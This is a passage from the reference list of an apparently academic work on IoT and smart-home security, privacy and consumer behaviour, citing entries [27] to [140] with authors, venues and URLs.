[27] Bluetooth SIG, “Bluetooth core specification v5.0,” December 2016. [Online]. Available: https://www.bluetooth.com/specifications

[28] A. Bolshev, J. Larsen, M. Krotofil, and R. Wightman, “A rising tide: Design exploits in industrial control systems,” in 10th USENIX Workshop on Offensive Technologies, WOOT 16, Austin, TX, USA, August 8-9, 2016, N. Silvanovich and P. Traynor, Eds. USENIX Association, 2016. [Online]. Available: https://www.usenix.org/conference/woot16/workshop-program/presentation/bolshev


[29] L. E. Bolton, L. Warlop, and J. W. Alba, “Consumer perceptions of price (un)fairness,” Journal of Consumer Research, vol. 29, no. 4, pp. 474–491, 03 2003. [Online]. Available: https://doi.org/10.1086/346244

[30] I. Bouij-Pasquier, A. A. E. Kalam, A. A. Ouahman, and M. D. Montfort, “A security framework for Internet of Things,” in Cryptology and Network Security - 14th International Conference, CANS 2015, Marrakesh, Morocco, December 10-12, 2015, Proceedings, ser. Lecture Notes in Computer Science, M. Reiter and D. Naccache, Eds., vol. 9476. Springer, 2015, pp. 19–31. [Online]. Available: https://doi.org/10.1007/978-3-319-26823-1_2

[31] J. Boyens, C. Paulsen, R. Moorthy, N. Bartol, and S. A. Shankles, “Supply chain risk management practices for federal information systems and organizations,” NIST SP 800-161, April 2015. [Online]. Available: http://dx.doi.org/10.6028/NIST.SP.800-161

[32] W. Boyer and M. McQueen, “Ideal based cyber security technical metrics for control systems,” in Critical Information Infrastructures Security, J. Lopez and B. M. Hämmerli, Eds. Berlin, Heidelberg: Springer Berlin Heidelberg, 2008, pp. 246–260.

[33] H. Bozdogan, “Model selection and Akaike’s Information Criterion (AIC): The general theory and its analytical extensions,” Psychometrika, vol. 52, no. 3, pp. 345–370, September 1987. [Online]. Available: https://doi.org/10.1007/BF02294361

[34] P. J. Buckley, K. W. Glaister, E. Klijn, and H. Tan, “Knowledge accession and knowledge acquisition in strategic alliances: The impact of supplementary and complementary dimensions,” British Journal of Management, vol. 20, no. 4, pp. 598–609, 2009. [Online]. Available: https://onlinelibrary.wiley.com/doi/abs/10.1111/j.1467-8551.2008.00607.x

[35] Busch-Jaeger, “ZigBee Light Link – This is how easy it is to create the right atmosphere with light,” 2017. [Online]. Available: https://www.busch-jaeger.de/en/products/product-solutions/remote-control/zigbee-light-link/

[36] California Legislative Information, “SB-327 Information privacy: Connected devices,” September 2018. [Online]. Available: http://leginfo.legislature.ca.gov/faces/billTextClient.xhtml?bill_id=201720180SB327

[37] Cambridge Dictionary, “The Internet of Things definition,” 2018. [Online]. Available: https://dictionary.cambridge.org/us/dictionary/english/internet-of-things

[38] L. M. Candanedo and V. Feldheim, “Accurate occupancy detection of an office room from light, temperature, humidity and CO2 measurements using statistical learning models,” Energy and Buildings, vol. 112, pp. 28–39, 2016. [Online]. Available: http://www.sciencedirect.com/science/article/pii/S0378778815304357


[39] A. Cavoukian, J. Polonetsky, and C. Wolf, “SmartPrivacy for the Smart Grid: Embedding privacy into the design of electricity conservation,” Identity in the Information Society, vol. 3, no. 2, pp. 275–294, 2010. [Online]. Available: http://dx.doi.org/10.1007/s12394-010-0046-y

[40] H. Cavusoglu, B. K. Mishra, and S. Raghunathan, “The effect of Internet security breach announcements on market value: Capital market reactions for breached firms and Internet security developers,” Int. J. Electronic Commerce, vol. 9, no. 1, pp. 70–104, 2004. [Online]. Available: https://doi.org/10.1080/10864415.2004.11044320

[41] Z. B. Celik, L. Babun, A. K. Sikder, H. Aksu, G. Tan, P. D. McDaniel, and A. S. Uluagac, “Sensitive information tracking in commodity IoT,” in 27th USENIX Security Symposium, USENIX Security 2018, Baltimore, MD, USA, August 15-17, 2018., W. Enck and A. P. Felt, Eds. USENIX Association, 2018, pp. 1687–1704. [Online]. Available: https://www.usenix.org/conference/ usenixsecurity18/presentation/celik

[42] Centre for European Policy Studies, “Software vulnerability disclosure in Europe – Technology, policies and legal challenges,” June 2018. [Online]. Available: https://www.cl.cam.ac.uk/~rja14/Papers/ceps-rvd2018.pdf

[43] A. Chapman, “Hacking into Internet connected light bulbs,” July 2014. [Online]. Available: http://www.contextis.com/resources/blog/hacking-internet-connected-light-bulbs/

[44] T. Chattopadhyay, N. Feamster, M. V. X. Ferreira, D. Y. Huang, and S. M. Weinberg, “Selling a single item with negative externalities,” in The World Wide Web Conference (WWW’19). New York, NY, USA: ACM, 2019, pp. 196–206. [Online]. Available: http://doi.acm.org/10.1145/3308558.3313692

[45] J. Chen, W. Diao, Q. Zhao, C. Zuo, Z. Lin, X. Wang, W. C. Lau, M. Sun, R. Yang, and K. Zhang, “IoTFuzzer: Discovering memory corruptions in IoT through app-based fuzzing,” in 25th Annual Network and Distributed System Security Symposium, NDSS 2018, San Diego, California, USA, February 18-21, 2018. The Internet Society, 2018. [Online]. Available: http://wp.internetsociety.org/ndss/wp- content/uploads/sites/25/2018/02/ndss2018 01A-1 Chen paper.pdf

[46] Q. A. Chen, Y. Yin, Y. Feng, Z. M. Mao, and H. X. Liu, “Exposing congestion attack on emerging connected vehicle based traffic signal control,” in 25th Annual Network and Distributed System Security Symposium, NDSS 2018, San Diego, California, USA, February 18-21, 2018. The Internet Society, 2018. [Online]. Available: http://wp.internetsociety.org/ndss/wp-content/uploads/sites/ 25/2018/02/ndss2018 01B-2 Chen paper.pdf

[47] F. Cicirelli, G. Fortino, A. Giordano, A. Guerrieri, G. Spezzano, and A. Vinci, “On the design of smart homes: A framework for activity recognition in home


environment,” Journal of Medical Systems, vol. 40, no. 9, p. 200, July 2016. [Online]. Available: https://doi.org/10.1007/s10916-016-0549-7 [48] Cisco, “The Internet of Things reference model,” June 2014. [Online]. Available: http://cdn.iotwf.com/resources/71/IoT Reference Model White Paper June 4 2014.pdf [49] Clickworker, “Data management services: AI training data, text creation, web researches,” 2018. [Online]. Available: https://www.clickworker.com/ [50] A. Cocchia, Smart and Digital City: A Systematic Literature Review. Springer International Publishing, 2014, pp. 13–43. [Online]. Available: https://doi.org/10. 1007/978-3-319-06160-3 2 [51] J. Cohen, Statistical power analysis for the behavioral sciences. Lawrence Erlbaum Associates, 1988. [52] M. P. Conchar, G. M. Zinkhan, C. Peters, and S. Olavarrieta, “An integrated framework for the conceptualization of consumers’ perceived-risk processing,” Journal of the Academy of Marketing Science, vol. 32, no. 4, pp. 418–436, September 2004. [Online]. Available: https://doi.org/10.1177/0092070304267551 [53] B. Copos, K. N. Levitt, M. Bishop, and J. Rowe, “Is anybody home? Inferring activity from smart home network traffic,” in 2016 IEEE Security and Privacy Workshops, SP Workshops 2016, San Jose, CA, USA, May 22-26, 2016. IEEE Computer Society, 2016, pp. 245–251. [Online]. Available: https://doi.org/10.1109/SPW.2016.48 [54] A. Costin, J. Zaddach, A. Francillon, and D. Balzarotti, “A large-scale analysis of the security of embedded firmwares,” in Proceedings of the 23rd USENIX Security Symposium, San Diego, CA, USA, August 20-22, 2014., K. Fu and J. Jung, Eds. USENIX Association, 2014, pp. 95–110. [Online]. Available: https://www.usenix. org/conference/usenixsecurity14/technical-sessions/presentation/costin [55] B. P. Crow, I. Widjaja, J. G. Kim, and P. Sakai, “Investigation of the IEEE 802.11 medium access control (MAC),” in Proceedings IEEE INFOCOM ’97, The Conference on Computer Communications, Sixteenth Annual Joint Conference of the IEEE Computer and Communications Societies, Driving the Information Revo- lution, Kobe, Japan, April 7-12, 1997. IEEE Computer Society, 1997, pp. 126–133. [Online]. Available: https://doi.org/10.1109/INFCOM.1997.635122 [56] A. Das, N. Borisov, and M. Caesar, “Do you hear what I hear?: Fingerprinting smart devices through embedded acoustic components,” in Proceedings of the 2014 ACM SIGSAC Conference on Computer and Communications Security, Scottsdale, AZ, USA, November 3-7, 2014, G. Ahn, M. Yung, and N. Li, Eds. ACM, 2014, pp. 441–452. [Online]. Available: http://doi.acm.org/10.1145/2660267.2660325 [57] J. Datko and T. Reed, “NSA Playset: DIY hardware implant over I2C,” DEF CON 22, August 2014. [Online]. Available: https://www.defcon.org/images/defcon-


22/dc-22-presentations/Datko-Reed/DEFCON-22-Josh-Datko-Teddy-Reed-NSA-Playset-DIY-Hardware-Implant-over-l2c-UPDATED.pdf [58] F. D. Davis, “Perceived usefulness, perceived ease of use, and user acceptance of information technology,” MIS Quarterly, vol. 13, no. 3, pp. 319–340, 1989. [Online]. Available: http://misq.org/perceived-usefulness-perceived-ease-of-use-and-user-acceptance-of-information-technology.html [59] S. J. De and D. L. Métayer, “Privacy harm analysis: A case study on smart grids,” in 2016 IEEE Security and Privacy Workshops, SP Workshops 2016, San Jose, CA, USA, May 22-26, 2016. IEEE Computer Society, 2016, pp. 58–65. [Online]. Available: https://doi.org/10.1109/SPW.2016.21 [60] P. de Pelsmacker, L. Driesen, and G. Rayp, “Do consumers care about ethics? Willingness to pay for fair-trade coffee,” The Journal of Consumer Affairs, vol. 39, no. 2, pp. 363–385, 2005. [Online]. Available: http://www.jstor.org/stable/23860612 [61] Deloitte, “Ready for takeoff?” Consumer Survey, July 2015. [Online]. Available: http://www2.deloitte.com/content/dam/Deloitte/de/Documents/technology-media-telecommunications/Smart%20Home%20Consumer%20Survey%20Text%2020150701.pdf [62] T. Denning, T. Kohno, and H. M. Levy, “Computer security and the modern home,” Commun. ACM, vol. 56, no. 1, pp. 94–103, 2013. [Online]. Available: http://doi.acm.org/10.1145/2398356.2398377 [63] N. Dhanjani, “Hacking lightbulbs: Security evaluation of the Philips Hue personal wireless lighting system,” August 2013. [Online]. Available: http://www.dhanjani.com/blog/2013/08/hacking-lightbulbs.html [64] T. Dinev and P. Hart, “An extended privacy calculus model for e-commerce transactions,” Information Systems Research, vol. 17, no. 1, pp. 61–80, 2006. [Online]. Available: http://www.jstor.org/stable/23015781 [65] B. Dong, B. Andrews, K. P. Lam, M. Höynck, R. Zhang, Y.-S. Chiou, and D. Benitez, “An information technology enabled sustainability test-bed (ITEST) for occupancy detection through an environmental sensing network,” Energy and Buildings, vol. 42, no. 7, pp. 1038–1046, 2010. [Online]. Available: http://www.sciencedirect.com/science/article/pii/S037877881000023X [66] M. D. Donno, N. Dragoni, A. Giaretta, and A. Spognardi, “DDoS-capable IoT malwares: Comparative analysis and Mirai investigation,” Security and Communication Networks, vol. 2018, pp. 1–30, 2018. [Online]. Available: https://doi.org/10.1155/2018/7178164 [67] A. Drewnowski, H. Moskowitz, M. Reisner, and B. Krieger, “Testing consumer perception of nutrient content claims using conjoint analysis,” Public Health Nutrition, vol. 13, no. 5, pp. 688–694, 2010. [Online]. Available: https://doi.org/10.1017/S1368980009993119


[68] A. Dunkels, B. Gr¨onvall, and T. Voigt, “Contiki - A lightweight and flexible operating system for tiny networked sensors,” in 29th Annual IEEE Conference on Local Computer Networks (LCN 2004), 16-18 November 2004, Tampa, FL, USA, Proceedings. IEEE Computer Society, 2004, pp. 455–462. [Online]. Available: https://doi.org/10.1109/LCN.2004.38 [69] A. Ebadat, G. Bottegal, D. Varagnolo, B. Wahlberg, and K. H. Johansson, “Esti- mation of building occupancy levels through environmental signals deconvolution,” in BuildSys 2013, Proceedings of the 5th ACM Workshop On Embedded Systems For Energy-Efficient Buildings, Roma, Italy, November 13-14, 2013, 2013, pp. 8:1–8:8. [Online]. Available: http://doi.acm.org/10.1145/2528282.2528290 [70] ——, “Regularized deconvolution-based approaches for estimating room occupan- cies,” IEEE Trans. Automation Science and Engineering, vol. 12, no. 4, pp. 1157– 1168, 2015. [Online]. Available: http://dx.doi.org/10.1109/TASE.2015.2471305 [71] Ecobee, “Privacy policy & terms of use,” April 2015. [Online]. Available: https://www.ecobee.com/legal/use/ [72] F. Eggers and H. Sattler, “Hybrid individualized two-level choice-based conjoint (HIT-CBC): A new method for measuring preference structures with many attribute levels,” International Journal of Research in Marketing, vol. 26, no. 2, pp. 108–118, 2009. [Online]. Available: http://www.sciencedirect.com/science/article/ pii/S0167811609000214 [73] T. Ekwevugbe, N. Brown, V. Pakka, and D. Fan, “Real-time building occupancy sensing using neural-network based sensor network,” in 7th IEEE International Conference on Digital Ecosystems and Technologies, DEST 2013, Menlo Park, CA, USA, July 24-26, 2013. IEEE, 2013, pp. 114–119. [Online]. Available: https://doi. org/10.1109/DEST.2013.6611339 [74] P. Emami-Naeini, H. Dixon, Y. Agarwal, and L. F. Cranor, “Exploring how privacy and security factor into IoT device purchase behavior,” in Proceedings of the 2019 CHI Conference on Human Factors in Computing Systems, CHI 2019, Glasgow, Scotland, UK, S. A. Brewster, G. Fitzpatrick, A. L. Cox, and V. Kostakos, Eds. ACM, 2019. [Online]. Available: https://doi.org/10.1145/3290605.3300764 [75] European Commission, “Energy Efficiency Directive,” 2017. [Online]. Available: https://ec.europa.eu/energy/en/topics/energy-efficiency/energy-efficiency-directive [76] European Parliament and the Council of the European Union, “Directive 2010/30/EU,” May 2010. [Online]. Available: http://eur-lex.europa.eu/legal- content/EN/ALL/?uri=CELEX:32010L0030 [77] ——, “Regulation (EU) 2016/679,” April 2016. [Online]. Available: http://data. europa.eu/eli/reg/2016/679/oj [78] European Union Agency for Network and Information Security (ENISA), “Security and resilience of smart home environments – Good practices and recommendations,”


December 2015. [Online]. Available: https://www.enisa.europa.eu/publications/ security-resilience-good-practices

[79] ——, “Baseline security recommendations for IoT,” October 2017. [Online]. Available: https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot

[80] C. Fachkha, E. Bou-Harb, A. Keliris, N. D. Memon, and M. Ahamad, “Internet-scale probing of CPS: Inference, characterization and orchestration analysis,” in 24th Annual Network and Distributed System Security Symposium, NDSS 2017, San Diego, California, USA, February 26 - March 1, 2017. The Internet Society, 2017. [Online]. Available: https://www.ndss-symposium.org/ndss2017/ndss-2017-programme/internet-scale-probing-cps-inference-characterization-and-orchestration-analysis/

[81] X. Fan, Q. Xie, X. Li, H. Huang, J. Wang, S. Chen, C. Xie, and J. Chen, “Activity recognition as a service for smart home: Ambient assisted living application via sensing home,” in IEEE International Conference on AI & Mobile Services, AIMS 2017, Honolulu, HI, USA, June 25-30, 2017, S. Tata and Z. Mao, Eds. IEEE Computer Society, 2017, pp. 54–61. [Online]. Available: https://doi.org/10.1109/AIMS.2017.29

[82] F. Faul, E. Erdfelder, A.-G. Lang, and A. Buchner, “G*Power 3: A flexible statistical power analysis program for the social, behavioral, and biomedical sciences,” Behavior Research Methods, vol. 39, no. 2, pp. 175–191, May 2007. [Online]. Available: https://doi.org/10.3758/BF03193146

[83] M. Featherman and P. A. Pavlou, “Predicting e-services adoption: A perceived risk facets perspective,” Int. J. Hum.-Comput. Stud., vol. 59, no. 4, pp. 451–474, 2003. [Online]. Available: https://doi.org/10.1016/S1071-5819(03)00111-3

[84] Federal Ministry for Environment, Nature Conservation, Construction and Nuclear Safety (Germany), “Lifespan label for electrical products – Study on the effect of lifespan information for electrical products on the purchasing decision,” July 2017. [Online]. Available: https://www.bundesregierung.de/resource/blob/975272/ 323454/046091a8ccdc126cdfe3e827ed0c27c2/download-produktlabel-lebensdauer- eng-data.pdf

[85] Federal Office for Information Security (Germany), “Protection profile for the gateway of a smart metering system (Smart Meter Gateway PP),” March 2014. [Online]. Available: https://www.commoncriteriaportal.org/files/ppfiles/ pp0073b pdf.pdf

[86] Federal Statistical Office (Germany), “Germany Census 2011,” 2011. [Online]. Available: https://www.zensus2011.de/EN

[87] ——, “Germany Mikrozensus 2014,” 2014. [Online]. Available: https://www.gesis. org/en/missy/metadata/MZ/2014/


[88] Federal Trade Commission, “Energy and water use labeling for consumer products under the Energy Policy and Conservation Act (“Energy Labeling Rule”),” 2018. [Online]. Available: https://www.ftc.gov/enforcement/rules/rulemaking- regulatory-reform-proceedings/energy-water-use-labeling-consumer [89] X. Feng, Q. Li, H. Wang, and L. Sun, “Acquisitional rule-based engine for discovering Internet-of-Thing devices,” in 27th USENIX Security Symposium, USENIX Security 2018, Baltimore, MD, USA, August 15-17, 2018., W. Enck and A. P. Felt, Eds. USENIX Association, 2018, pp. 327–341. [Online]. Available: https://www.usenix.org/conference/usenixsecurity18/presentation/feng [90] N. Fern, I. San, C¸. K. Ko¸c, and K. Cheng, “Hardware trojans in incompletely specified on-chip bus systems,” in 2016 Design, Automation & Test in Europe Conference & Exhibition, DATE 2016, Dresden, Germany, March 14-18, 2016, L. Fanucci and J. Teich, Eds. IEEE, 2016, pp. 527–530. [Online]. Available: http://ieeexplore.ieee.org/document/7459366/ [91] E. Fernandes, J. Jung, and A. Prakash, “Security analysis of emerging smart home applications,” in IEEE Symposium on Security and Privacy, SP 2016, San Jose, CA, USA, May 22-26, 2016. IEEE Computer Society, 2016, pp. 636–654. [Online]. Available: https://doi.org/10.1109/SP.2016.44 [92] E. Fernandes, J. Paupore, A. Rahmati, D. Simionato, M. Conti, and A. Prakash, “Flowfence: Practical data protection for emerging IoT application frameworks,” in 25th USENIX Security Symposium, USENIX Security 16, Austin, TX, USA, August 10-12, 2016., T. Holz and S. Savage, Eds. USENIX Association, 2016, pp. 531–548. [Online]. Available: https://www.usenix.org/conference/usenixsecurity16/technical- sessions/presentation/fernandes [93] E. Fernandes, A. Rahmati, J. Jung, and A. Prakash, “Decentralized action integrity for trigger-action IoT platforms,” in 25th Annual Network and Distributed System Security Symposium, NDSS 2018, San Diego, California, USA, February 18-21, 2018. The Internet Society, 2018. [Online]. Available: http://wp.internetsociety.org/ ndss/wp-content/uploads/sites/25/2018/02/ndss2018 01A-3 Fernandes paper.pdf

[94] A. Field, Discovering statistics using IBM SPSS statistics. Sage Publications, 2013. [95] J. FitzPatrick, “The Tao of hardware, the Te of implants,” Black Hat USA, August 2016. [Online]. Available: https://www.blackhat.com/docs/us-16/materials/us-16- FitzPatrick-The-Tao-Of-Hardware-The-Te-Of-Implants-wp.pdf [96] A. Forget, S. Pearman, J. Thomas, A. Acquisti, N. Christin, L. F. Cranor, S. Egelman, M. Harbach, and R. Telang, “Do or do not, there is no try: User engagement may not improve security outcomes,” in Twelfth Symposium on Usable Privacy and Security, SOUPS 2016, Denver, CO, USA, June 22-24, 2016. USENIX Association, 2016, pp. 97–111. [Online]. Available: https://www.usenix. org/conference/soups2016/technical-sessions/presentation/forget


[97] D. Formby, P. Srinivasan, A. Leonard, J. Rogers, and R. A. Beyah, “Who’s in control of your control system? Device fingerprinting for cyber-physical systems,” in 23rd Annual Network and Distributed System Security Symposium, NDSS 2016, San Diego, California, USA, February 21-24, 2016. The Internet Society, 2016. [Online]. Available: http://wp.internetsociety.org/ndss/wp-content/uploads/sites/25/2017/09/who-control-your-control-system-device-fingerprinting-cyber-physical-systems.pdf [98] R. Fujdiak, P. Blazek, K. Mikhaylov, L. Malina, P. Mlynek, J. Misurec, and V. Blazek, “On track of Sigfox confidentiality with end-to-end encryption,” in Proceedings of the 13th International Conference on Availability, Reliability and Security, ARES 2018, Germany, August 27-30, 2018, S. Doerr, M. Fischer, S. Schrittwieser, and D. Herrmann, Eds. ACM, 2018, pp. 19:1–19:6. [Online]. Available: http://doi.acm.org/10.1145/3230833.3232805 [99] Gartner, “Gartner says 8.4 billion connected ‘things’ will be in use in 2017, up 31 percent from 2016,” February 2017. [Online]. Available: https://www.gartner.com/newsroom/id/3598917 [100] Gartner IT Glossary, “The Internet of Things defined,” 2018. [Online]. Available: https://www.gartner.com/it-glossary/internet-of-things/

[101] J. Gershman, “Samsung faces class action over Galaxy Note 7 recalls,” The Wall Street Journal, October 2016. [Online]. Available: http://blogs.wsj.com/law/2016/ 10/18/samsung-faces-class-action-over-galaxy-note-7-recalls/ [102] S. Ghaffarzadegan, A. Reiss, M. Ruhs, R. Duerichen, and Z. Feng, “Occupancy detection in commercial and residential environments using audio signal,” in Proc. Interspeech 2017, 2017, pp. 3802–3806. [Online]. Available: http://dx.doi.org/10. 21437/Interspeech.2017-524 [103] T. J. Gilbride, P. J. Lenk, and J. D. Brazell, “Market share constraints and the loss function in choice-based conjoint analysis,” Marketing Science, vol. 27, no. 6, pp. 995–1011, 2008. [Online]. Available: https://doi.org/10.1287/mksc.1080.0369 [104] K. W. Glaister and P. J. Buckley, “Strategic motives for international alliance for- mation,” Journal of Management Studies, vol. 33, no. 3, pp. 301–332, 1996. [105] V. D. Gligor, “Handling new adversaries in wireless ad-hoc networks (transcript of discussion),” in Security Protocols XVI - 16th International Workshop, Cambridge, UK, ser. Lecture Notes in Computer Science, B. Christianson, J. A. Malcolm, V. Matyas, and M. Roe, Eds., vol. 6615. Springer, 2008, pp. 120–125. [Online]. Available: https://doi.org/10.1007/978-3-642-22137-8 18 [106] F. G´omez-Bravo, R. Jim´enez-Naharro, J. M. Garc´ıa, J. A. G. Gal´an, and M. Sanchez-Raya, “Hardware attacks on mobile robots: I2C clock attacking,” in Robot 2015: Second Iberian Robotics Conference - Advances in Robotics, Lisbon, Portugal, 19-21 November 2015, Volume 1, ser. Advances in Intelligent Systems


and Computing, L. P. Reis, A. P. Moreira, P. U. Lima, L. Montano, and V. F. Mu˜noz-Mart´ınez,Eds., vol. 417. Springer, 2015, pp. 147–159. [Online]. Available: https://doi.org/10.1007/978-3-319-27146-0 12 [107] D. Goodin, “9 Baby monitors wide open to hacks that expose users’ most private moments,” Ars Technica, September 2015. [Online]. Avail- able: https://arstechnica.com/information-technology/2015/09/9-baby-monitors- wide-open-to-hacks-that-expose-users-most-private-moments/ [108] T. Goodspeed, S. Bratus, R. Melgares, R. Speers, and S. W. Smith, “Api-do: Tools for exploring the wireless attack surface in smart meters,” in 45th Hawaii International Conference on Systems Science (HICSS-45 2012), Proceedings, 4-7 January 2012, Grand Wailea, Maui, HI, USA. IEEE Computer Society, 2012, pp. 2133–2140. [Online]. Available: http://dx.doi.org/10.1109/HICSS.2012.115 [109] L. A. Gordon, M. P. Loeb, and L. Zhou, “The impact of information security breaches: Has there been a downward shift in costs?” Journal of Computer Security, vol. 19, no. 1, pp. 33–56, 2011. [Online]. Available: https://doi.org/10.3233/JCS-2009-0398 [110] P. E. Green, A. M. Krieger, and Y. Wind, “Thirty years of conjoint analysis: Reflections and prospects,” Interfaces, vol. 31, no. 3, pp. 56–73, 2001. [Online]. Available: https://doi.org/10.1287/inte.31.3s.56.9676 [111] P. E. Green and V. Srinivasan, “Conjoint analysis in consumer research: Issues and outlook,” Journal of Consumer Research, vol. 5, no. 2, pp. 103–123, 1978. [Online]. Available: http://dx.doi.org/10.1086/208721 [112] U. Greveler, P. Gl¨osek¨otterz, B. Justusy, and D. Loehr, “Multimedia content identification through smart meter power usage profiles,” in Proceedings of the International Conference on Information and Knowledge Engineering (IKE), 2012. [Online]. Available: http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.727. 4674&rep=rep1&type=pdf [113] J. Hagedoorn, “Understanding the rationale of strategic technology partnering- interorganizational modes of cooperation and sectoral differences,” Strategic management journal, vol. 14, no. 5, pp. 371–385, 1993. [Online]. Available: https://onlinelibrary.wiley.com/doi/abs/10.1002/smj.4250140505 [114] E. Hailemariam, R. Goldstein, R. Attar, and A. Khan, “Real-time occupancy detection using decision trees with multiple sensor types,” in 2011 Spring Simulation Multi-conference, SpringSim ’11, Boston, MA, USA, April 03-07, 2011., 2011, pp. 141–148. [Online]. Available: http://dl.acm.org/citation.cfm?id=2048555 [115] M. Hall, E. Frank, G. Holmes, B. Pfahringer, P. Reutemann, and I. H. Witten, “The WEKA data mining software: An update,” SIGKDD Explor. Newsl., vol. 11, no. 1, pp. 10–18, November 2009. [Online]. Available: http://doi.acm.org/10.1145/1656274.1656278


[116] R. Hallman, J. Bryan, G. Palavicini, J. DiVita, and J. Romero-Mariona, “IoDDoS - The Internet of distributed denial of service attacks - A case study of the Mirai malware and IoT-based botnets,” in Proceedings of the 2nd International Conference on Internet of Things, Big Data and Security, IoTBDS 2017, Porto, Portugal, April 24-26, 2017, M. Ramachandran, V. M. Muñoz, V. Kantere, G. Wills, R. J. Walters, and V. Chang, Eds. SciTePress, 2017, pp. 47–58. [Online]. Available: https://doi.org/10.5220/0006246600470058 [117] Z. Han, R. X. Gao, and Z. Fan, “Occupancy and indoor environment quality sensing for smart buildings,” in 2012 IEEE International Instrumentation and Measurement Technology Conference (I2MTC), May 2012, pp. 882–887. [Online]. Available: http://dx.doi.org/10.1109/I2MTC.2012.6229557 [118] S. M. Handmaker, “Good counsel: Using conjoint analysis to calculate damages,” Trial, June 2018. [Online]. Available: https://www.cohenmilstein.com/sites/default/files/AAJ Trial Conjoint Analysis July 2018 Handmaker.pdf [119] G. W. Hart, “Residential energy monitoring and computerized surveillance via utility power flows,” Technology and Society Magazine, IEEE, vol. 8, no. 2, pp. 12–16, 1989. [Online]. Available: https://ieeexplore.ieee.org/abstract/document/31557

[120] T. Hastie, R. Tibshirani, and J. H. Friedman, The Elements of Statistical Learning, 2nd ed. New York, NY, USA: Springer, 2009. [121] W. He, M. Golla, R. Padhi, J. Ofek, M. D¨urmuth, E. Fernandes, and B. Ur, “Rethinking access control and authentication for the home Internet of Things (IoT),” in 27th USENIX Security Symposium, USENIX Security 2018, Baltimore, MD, USA, August 15-17, 2018., W. Enck and A. P. Felt, Eds. USENIX Association, 2018, pp. 255–272. [Online]. Available: https://www.usenix.org/conference/usenixsecurity18/presentation/he [122] D. Heiland, “R7-2016-10: Multiple Osram Sylvania Osram Lightify vul- nerabilities (CVE-2016-5051 through 5059),” July 2016. [Online]. Available: https://community.rapid7.com/community/infosec/blog/2016/07/26/r7-2016-10- multiple-osram-sylvania-osram-lightify-/vulnerabilities-cve-2016-5051-through- 5059 [123] A. Hern, “Someone made a smart vibrator, so of course it got hacked,” The Guardian, August 2016. [Online]. Available: https://www.theguardian.com/ technology/2016/aug/10/vibrator-phone-app-we-vibe-4-plus-bluetooth-hack [124] M. Hicks, M. Finnicum, S. T. King, M. M. K. Martin, and J. M. Smith, “Overcoming an untrusted computing base: Detecting and removing malicious hardware automatically,” in 31st IEEE Symposium on Security and Privacy, S&P 2010, 16-19 May 2010, Berleley/Oakland, California, USA. IEEE Computer Society, 2010, pp. 159–172. [Online]. Available: https://doi.org/10.1109/SP.2010.18 [125] S. Hieke and P. Wilczynski, “Colour me in – An empirical study on


consumer responses to the traffic light signposting system in nutrition labelling,” Public Health Nutrition, vol. 15, no. 5, p. 773–782, 2012. [Online]. Available: https://doi.org/10.1017/S1368980011002874 [126] S. Higginbotham, “You can introduce the industrial Internet with a single light bulb,” Fortune, April 2015. [Online]. Available: http://fortune.com/2015/04/23/ industrial-internet-light-bulb/ [127] G. Ho, D. Leung, P. Mishra, A. Hosseini, D. Song, and D. A. Wagner, “Smart locks: Lessons for securing commodity Internet of Things devices,” in Proceedings of the 11th ACM on Asia Conference on Computer and Communications Security, AsiaCCS 2016, Xi’an, China, May 30 - June 3, 2016, X. Chen, X. Wang, and X. Huang, Eds. ACM, 2016, pp. 461–472. [Online]. Available: http://doi.acm.org/ 10.1145/2897845.2897886 [128] M. B. Holbrook and W. L. Moore, “Conjoint analysis on objects with environmen- tally correlated attributes: The questionable importance of representative design,” Journal of Consumer Research, vol. 16, no. 4, pp. 490–497, March 1990. [Online]. Available: https://dx.doi.org/10.1086/209234 [129] Honeywell, “Honeywell connected home privacy statement,” December 2015. [Online]. Available: https://www.honeywell.com/privacy-statement [130] HopeRF Electronic, “RFM95/96/97/98(W) – Low power long range transceiver module V1.0 datasheet.” [Online]. Available: https://cdn.sparkfun.com/assets/ learn tutorials/8/0/4/RFM95 96 97 98W.pdf [131] J. F. Huber, D. Weiler, and H. Brand, “UMTS, the mobile multimedia vision for IMT 2000: A focus on standardization,” IEEE Communications Magazine, vol. 38, no. 9, pp. 129–136, September 2000. [Online]. Available: https://ieeexplore.ieee.org/abstract/document/868152 [132] J. Huber, D. R. Wittink, J. A. Fiedler, and R. Miller, “The effectiveness of alternative preference elicitation procedures in predicting choice,” Journal of Marketing Research, vol. 30, no. 1, pp. 105–114, 1993. [Online]. Available: https://doi.org/10.1177/002224379303000109 [133] V. Huppert, J. Paulus, U. Paulsen, M. Burkart, B. Wullich, and B. M. Eskofier, “Quantification of nighttime micturition with an ambulatory sensor-based system,” IEEE J. Biomedical and Health Informatics, vol. 20, no. 3, pp. 865–872, 2016. [Online]. Available: https://doi.org/10.1109/JBHI.2015.2421487 [134] IC Insights, “NXP acquires Freescale, becomes top MCU supplier in 2016,” April 2017. [Online]. Available: http://www.icinsights.com/news/bulletins/NXP- Acquires-Freescale-Becomes-Top-MCU-Supplier-In-2016/ [135] IControl, “IControl networks: 2015 state of the smart home report.” [Online]. Available: https://www.icontrol.com/blog/2015-state-of-the-smart-home-report


[136] IEEE Computer Society, “IEEE standard for information technology - Telecommu- nications and information exchange between systems - Local and metropolitan area networks specific requirements Part 15.4: Wireless medium access control (MAC) and physical layer (PHY) specifications for low-rate wireless personal area networks (LR-WPANs),” IEEE Std 802.15.4-2003, pp. 1–670, 2003. [137] Intel, “The Intel IoT platform – Architecture specification Internet of Things (IoT),” 2015. [Online]. Available: https://www.intel.de/content/www/de/de/internet-of- things/white-papers/iot-platform-reference-architecture-paper.html [138] Intel Security, “Intel security’s international Internet of Things smart home survey shows many respondents sharing personal data for money,” March 2016. [Online]. Available: https://newsroom.intel.com/news-releases/intel-securitys-international- internet-of-things-smart-home-survey [139] International Organization for Standardization, “ISO/IEC 30111:2013 – Information technology – Security techniques – Vulnerability handling processes,” November 2013. [Online]. Available: https://www.iso.org/standard/53231.html [140] ——, “ISO/IEC 29147:2014 – Information technology – Security techniques – Vulnerability disclosure,” February 2014. [Online]. Available: https://www.iso.org/ standard/45170.html

